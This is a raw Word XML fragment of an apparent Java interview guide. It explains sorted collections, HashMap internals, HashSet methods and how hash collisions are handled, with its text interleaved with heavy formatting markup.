          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4770397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map: " + map);  // Output: {Apple=1, Banana=2, Orange=3}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375A3B9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Banana': " + map.lowerKey("Banana"));  // Output: Apple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BABE44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Banana': " + map.higherKey("Banana"));  // Output: Orange</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C61068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45471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9C5C89F" w14:textId="77777777" w:rsidR="004E1BF9" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00990AD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54263">
          <v:rect id="_x0000_i1578" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AE789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6474"/>
        <w:gridCol w:w="2268"/>
      </w:tblGrid>
      <w:tr w:rsidR="00990ADD" w:rsidRPr="00CE4B95" w14:paraId="045AA928" w14:textId="77777777" w:rsidTr="004E1BF9">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47552A5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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29475F7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32265A15"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lementation Examples</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00990ADD" w:rsidRPr="00CE4B95" w14:paraId="770917B4" w14:textId="77777777" w:rsidTr="004E1BF9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="251808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Set</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="260F92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et that maintains elements in sorted order.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E69AC7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49886739" w14:textId="77777777" w:rsidTr="004E1BF9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32DF5E7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Map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E388B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that maintains keys in sorted order.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A5BA9A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990ADD" w:rsidRPr="00CE4B95" w14:paraId="4486F007" w14:textId="77777777" w:rsidTr="004E1BF9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10ECE3B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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AE83CB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Set, providing methods to navigate the set and retrieve nearest elements.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A6F226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7023CAF1" w14:textId="77777777" w:rsidTr="004E1BF9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07B3220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Map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E2C0B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Map, providing methods to navigate the map and retrieve nearest keys.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AB796D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bl>
    <w:p w14:paraId="282D6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Sorted Collections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7121082C"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Used when you need a set of unique elements that are automatically sorted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B437985"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Used when you need a map where keys are sorted, and you need to retrieve data based on sorted keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0699AEC6"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NavigableMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used when you need additional navigation functionality, such as finding the nearest lower or higher element or key in a sorted collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D2920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in Java are essential when you need elements or keys that must be kept in a specific order, whether that's the natural order or a custom order defined by a comparator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5F03BF" w14:textId="3459235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79" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EFDCF3"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98" w:name="_Toc197867412"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Which data structure is used by HashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="198"/>
    </w:p>
    <w:p w14:paraId="53044E62" w14:textId="6AB7299E" w:rsidR="00132A59" w:rsidRPr="00CE4B95" w:rsidRDefault="00132A59" w:rsidP="00660C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ata structure used by HashMap in Java i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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673FD6AC"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HashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171B72DB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A63890"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In case of a hash collision (when two keys have the same hash code), the entries were stored in a linked list at the same index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D4D837"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If the number of collisions becomes large at a specific index (i.e., if the linked list becomes long), the linked list is converted into a balanced tree (like a Red-Black tree), improving search efficiency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7758AD"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Factor and Rehashing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A HashMap is resized when the number of entries exceeds a certain threshold. This threshold is determined by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When the threshold is crossed, the HashMap is rehashed, meaning a new larger array of buckets is created and the elements are redistributed among the new buckets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C919C24"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920133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as its core data structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8E858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are hashed, and the hash code determines the bucket where the key-value pair will be stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA5E783"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 xml:space="preserve"> is done through linked lists or trees (from Java 8 onward).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AF410B"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xml:space="preserve"> occurs when the size exceeds a threshold, based on the load factor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155EFC2B" w14:textId="77777777" w:rsidR="00132A59" w:rsidRPr="00CE4B95" w:rsidRDefault="00132A59" w:rsidP="00660C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HashMap to provide constant time (O(1)) complexity for most operations like get(), put(), and remove(), although the complexity can degrade to O(n) in the worst-case scenario due to hash collisions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264F82DD" w14:textId="3CDCA64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580" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D15196" w14:textId="23FA6268" w:rsidR="00101830" w:rsidRPr="00CE4B95" w:rsidRDefault="00101830">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="199" w:name="_Toc197867413"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Hash</w:t>
      </w:r>
      <w:r w:rsidR="0018488B"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99"/>
    </w:p>
    <w:p w14:paraId="340E3B2B" w14:textId="707683D8" w:rsidR="00D44F2B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D44F2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xml:space="preserve"> and does not maintain any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its elements. HashSet is backed by a hash table (actually a HashMap), so it provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>constant time performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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CE4B95" w:rsidRDefault="00D44F2B" w:rsidP="00D44F2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2100B225"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HashSet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BF00E5"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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 values:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A HashSet allows at most one null element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F4A114"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 Time Complexity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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CE4B95" w:rsidRDefault="009D5767" w:rsidP="00D44F2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41D439A2" w14:textId="4098B85D"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05B3CCA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o):</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Object o):</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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turns the number of elements in the set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BA2F8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sEmpty():</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Returns true if the set is empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBF263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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Removes all elements from the set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C28E3D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Returns an iterator over the elements in the set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC35AA4" w14:textId="77777777" w:rsidR="00A1213D" w:rsidRPr="00CE4B95" w:rsidRDefault="00A1213D" w:rsidP="00D44F2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07B9983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84B665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3FA0FEA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57171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1BA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16F1D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F49873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72D56AAC"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6A481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lements to the HashSet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085C5AB9"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A111F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5DFE1A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785747D2"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6B2E3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y adding a duplicate element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D8AF3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dd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will return false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C7F7B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 add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dded</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56776D84"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B13DB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n element exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30996A6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ains 'Banan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0892B70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83317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an element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670DCAD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172AA87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8CBBD5"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all elements (order is not guaranteed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640ED0D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s in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p>
    <w:p w14:paraId="276EA89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47671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the size of the HashSet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4A2E2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ze of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01D9576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F9C31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HashSet is empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBEDCB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set emp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2E265D9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7CCDF" w14:textId="159229EB"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAA2012"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8F4FD08"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Apple</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> add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99BDF31"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Contai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2BCE38FD"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E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er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order is not guaranteed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216D01C0"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Siz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1CCA8E91" w14:textId="4C5C38CB"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F307CA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422B977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Operations:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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s of HashSet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0187830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CE4B95"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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="656DC8D8" w14:textId="77777777" w:rsidR="003977DB" w:rsidRPr="00CE4B95" w:rsidRDefault="003977DB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="200" w:name="_Toc197867414"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Which data structure used by HashSet?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="200"/>
    </w:p>
    <w:p w14:paraId="1638A880" w14:textId="6A25146D" w:rsidR="003977DB" w:rsidRPr="00CE4B95" w:rsidRDefault="00397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Set in Java is internally backed by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6A4E782"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4F5211C2"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a HashSet, it is actually stored as a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in the internal HashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A802DC6"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CE4B95"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9D87075">
          <v:rect id="_x0000_i1582" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="493E3C90" w14:textId="32422C00"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Structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E989807" w14:textId="77777777"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ansi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p>
    <w:p w14:paraId="48C8BF71" w14:textId="7FAEE39B"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PR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3B79A83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you do:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDF6BE9" w14:textId="77777777"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22066F3D" w14:textId="622D2A69"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3210351D"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the hood, it works like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7B8E35" w14:textId="6B164C40" w:rsidR="003977DB" w:rsidRPr="00CE4B95"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SENT</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680B63A3"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HashMap?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FA62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Map uses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to store and retrieve keys efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB490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HashSet to provide </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>average O(1) time complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for operations like add(), remove(), and contains().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760BD5FC"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CE4B95" w14:paraId="469C1C2A" w14:textId="77777777" w:rsidTr="003977DB">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F1D1AC9"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age Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003977DB" w:rsidRPr="00CE4B95" w14:paraId="1CB2FA91" w14:textId="77777777" w:rsidTr="003977DB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DF14BC6"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s keys, dummy Object as values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5FA8FD74" w14:textId="3EF60B10"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 HashSet is essentially a wrapper around HashMap that stores only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ignoring the values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45581CB2" w14:textId="34798BC2" w:rsidR="00F764B3" w:rsidRPr="00CE4B95"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3" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A84808" w14:textId="77777777" w:rsidR="001D5028" w:rsidRPr="00CE4B95" w:rsidRDefault="001D5028">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="201" w:name="_Toc197867415"/>
      <w:r w:rsidRPr="00CE4B95">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201"/>
    </w:p>
    <w:p w14:paraId="0DEBED0A" w14:textId="4EEF861F" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD287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down the scenario wher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in a HashMap, along with how the data is stored and how it differs when using ConcurrentHashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF159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Map with Same Hash Code and Same Value:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0FA82C"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 Process</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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different keys have the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same hash code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (a hash collision), they will be placed in the same bucket (index in the hash table array).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFAED4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e same value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. If the keys are not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even though the values are the same), they will be stored in the same bucket but as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>separate entries</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776CAA2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HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC8AEAE"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xml:space="preserve">: The entries are stor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same index in the bucket. Each node in the linked list contains a key-value pair.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E1FD4A" w14:textId="77777777" w:rsidR="00B73390" w:rsidRPr="00CE4B95" w:rsidRDefault="00B73390" w:rsidP="00CD2871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>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when you insert the second key-value pair with the same hash code, it will be stored as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new node</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the linked list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBEBC93"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xml:space="preserve">: If the number of collisions increases (i.e., many keys with the same hash code), the linked list may be converted in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like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This improves search performance from O(n) (for a linked list) to O(log n) (for a tree).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3355323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the second key-value pair will be inserted as another node in the linked list or tree at the same index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66732CA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pdate Scenario</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B852556"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ame key is added with the same value, the value will be updated in the existing node of the linked list or tree at the bucket’s index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF63B3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key-value pair has the same key but a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
